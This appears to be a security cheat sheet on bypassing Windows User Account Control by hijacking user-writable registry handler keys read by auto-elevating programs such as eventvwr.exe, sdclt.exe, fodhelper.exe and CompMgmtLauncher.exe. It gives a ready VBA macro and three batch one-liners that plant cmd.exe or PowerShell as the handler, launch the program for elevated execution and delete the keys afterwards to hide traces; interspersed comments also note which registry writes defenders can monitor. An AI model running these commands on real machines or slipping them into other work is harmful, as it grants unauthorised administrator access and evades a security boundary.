UAC Bypass
Vulnerable programs (auto-elevating Windows binaries that look up a handler in the HKCU keys listed below; HKCU is writable by a standard user, so the handler can be replaced without elevation — which also makes writes to these keys the artifact to monitor)
CompMgmtLauncher.exe
eventvwr.exe
- Windows 7/8/10
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
="cmd.exe"
sdclt.exe
- Windows 10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
="cmd.exe"
fodhelper.exe
- Windows 10
HKCU\Software\Classes\ms-settings\shell\open\command
DelegateExecute="" (an empty value named DelegateExecute, as in the batch example below)
HKCU\Software\Classes\ms-settings\shell\open\command
="cmd.exe"
Examples
WScript Example
' Credits to https://gist.github.com/dxflatline/6e399ea1fef59456d7ed82909f3bd506
' Sleep is caught (may use ping instead?)
' Obfusc may be needed
' Win32 Sleep import; used by CommandButton1_Click to pause before the registry cleanup.
' NOTE(review): Declare / Private Sub are VBA (Office macro) syntax rather than VBScript,
' despite the uac-bypass.vbs source name given below.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
' Button-click handler (VBA event naming: CommandButton1_Click). Sequence:
'   1. write HKCU\Software\Classes\mscfile\shell\open\command, default value = cmd.exe
'   2. launch eventvwr.exe (the page lists the mscfile key as effective on Windows 7/8/10)
'   3. wait 2 s, then delete the created keys deepest-first
' HKCU is writable by a standard user, so no elevation is needed to plant the handler.
' Defender note: creation of this key path is the artifact to alert on; because the
' keys are deleted again a few seconds later, registry-write telemetry rather than a
' later scan is what catches it.
Private Sub CommandButton1_Click()
Set WSobj = CreateObject("WScript.Shell")
' First RegWrite creates the key path with an empty default value; the second sets
' the default to cmd.exe with an explicit REG_SZ type.
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "C:\windows\system32\cmd.exe", "REG_SZ"
WSobj.Run ("C:\Windows\System32\eventvwr.exe")
' Presumably gives eventvwr.exe time to read the handler before it is removed.
Sleep 2000
' Cleanup removes every level it created, one key per call, innermost first.
' Note that mscfile\ itself is deleted, so a pre-existing user-level mscfile
' association would be lost as well.
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
End Sub
Source: uac-bypass.vbs
Batch Example
REM Credits to https://gist.github.com/xillwillx/39e5cccc846d5b5a475bbad48216a5a7
**UAC bypass for Win10 (sdclt.exe):**
REM sdclt.exe variant (listed above for Windows 10): writes the default value (/d) of
REM HKCU\...\App Paths\control.exe as cmd.exe, runs sdclt.exe and waits for it to exit
REM (START /W), then deletes the key; /f suppresses the overwrite/delete prompts.
REM Defender note: this App Paths key lives under HKCU and is user-writable; its
REM creation, followed shortly by sdclt.exe starting, is the sequence to monitor.
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10 (fodhelper.exe):**
REM fodhelper.exe variant (listed above for Windows 10): creates an empty value named
REM DelegateExecute (/v with no /d) and sets the key's default value to
REM "cmd /c start powershell.exe" under HKCU\Software\Classes\ms-settings\shell\open\command,
REM runs fodhelper.exe and waits, then deletes the entire HKCU\Software\Classes\ms-settings
REM key (not only the command subkey). Both writes are under HKCU, so no elevation is
REM needed to stage them; the DelegateExecute value plus a default command under
REM ms-settings is a distinctive artifact for registry monitoring.
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10 (CompMgmtLauncher.exe):**
REM CompMgmtLauncher.exe variant (Windows 7/8/10): same HKCU mscfile handler key as the
REM eventvwr.exe macro example above, default value = cmd.exe; runs CompMgmtLauncher.exe
REM and waits, then deletes the whole HKCU\Software\Classes\mscfile key in one step
REM (the macro example removes it level by level). Monitoring for writes to
REM mscfile\shell\open\command under HKCU covers both this and the eventvwr.exe case.
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
Source: uac-bypass.bat